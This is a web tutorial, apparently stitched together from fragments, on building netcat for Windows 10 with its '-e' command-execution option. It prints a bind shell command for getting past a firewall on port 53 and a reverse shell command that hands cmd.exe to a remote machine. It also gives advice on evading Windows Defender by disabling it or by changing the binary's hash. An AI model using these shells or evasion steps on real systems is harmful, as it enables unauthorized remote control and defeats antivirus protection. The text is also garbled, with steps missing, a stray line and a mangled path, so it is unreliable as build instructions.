These steps will compile an executable (default: nc.exe) on a Windows 10 machine. This build will enable the “-e” command line option (also known as “GAPING_SECURITY_HOLE”). The “-e” option allows you to pass a command into NetCat; example:
Small update: netcat 1.12 - adds -c command-line option to send CRLF line endings instead of just CR (eg. To talk to Exchange SMTP) Warning: a bunch of antiviruses think that netcat (nc.exe) is harmful for some reason, and may block or delete the file when you try to download it.
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to.
Netcat Windows Examples
I discovered that MobaXterm for Windows has the nc (netcat) command, as well as many other Unix commands, like ls, ps, and kill. I wholeheartedly recommend MobaXterm, especially if you are familiar with both Unix and DOS. Run Netcat listening behind the firewall on port 53. Nc -L -p 53 -e cmd.exe Then from outside the firewall connect to the listening machine: nc -v xxx.xxx.xxx.xx 53 If you get a command prompt then you are executing commands on the listening machine. Use 'exit' at the command prompt for a clean disconnect. Netcat (or nc in short) is a simple yet powerful networking command-line tool used for performing any operation in Linux related to TCP, UDP, or UNIX-domain sockets. Netcat can be used for port scanning, port redirection, as a port listener (for incoming connections); it can also be used to open remote connections and so many other things.
To create a reverse shell:
nc <remote control machine> <remote control port> -e cmd.exe
The caveat for Windows 10 is that Window’s Defender detects nc.exe as being “malware” and deletes it. Therefore beware the git repo we use here does have a compiled version. If you have Windows Defender active this file will likely be deleted. When you compile a new nc.exe it too will likely be deleted.
Window Defender Workaround
You have two easy options to get around Window Defender.
Disable Windows Defender while you use netcat or;
Before you compile edit a source file. There are numerous areas, especially in netcat.c where status messages (such as at line 381) are sent as output to a terminal. If you change the message, then compile, you will change the hash of the file. Windows Defender seems to be largely tied to file hashes.
4) From the MinGW Installation Manager I needed to select the following plugins: 4a) mingw32-developer-toolkit 4b) mingw32-base 4c) mingw32-gcc-g++ 4d) mingw32-gcc-objc 4e) mysys-base Video from browser mac.
6) Make sure your PATH system variable includes a reference to the MinGW DLLs. 6a) The default path is:
C:MinGWbin
6b) Start > Control Panel > Advanced Settings > Environment Variables 6c) Select “Path” from “User variables for [your user name]”. 6d) Select Edit… 6e) Add the path the the DLL folder (default: c:MinGWbin). 6f) Apply Changes / Close Control Panel Windows 6g) Restart Windows
7) Verify the gcc compiler is includes references to the DLL path. 7a) Open CMD and type:
gcc -print-search-dirs
7b) Amoung other things you should see references to /mingw32/bin
8) Still in CMD navigate to the folder which holds the NetCat source files. 8a) Run makewin.cmd 8b) You may get the following error:
As long as there are no other errors (not talking about warnings) you should be fine. What happens is the default makewin.cmd script attempts to copy the newly complied nc.exe file into your system32 folder (which if you get this error cannot be done because that folder is protected). This error can be ignored as you have the compiled binary in the folder you are currently in.
8c) There will be some warnings that look like errors.
Netcat Commands List
You now have a compiled nc.exe which is able to run on Windows 10. You can pass in the -e argument.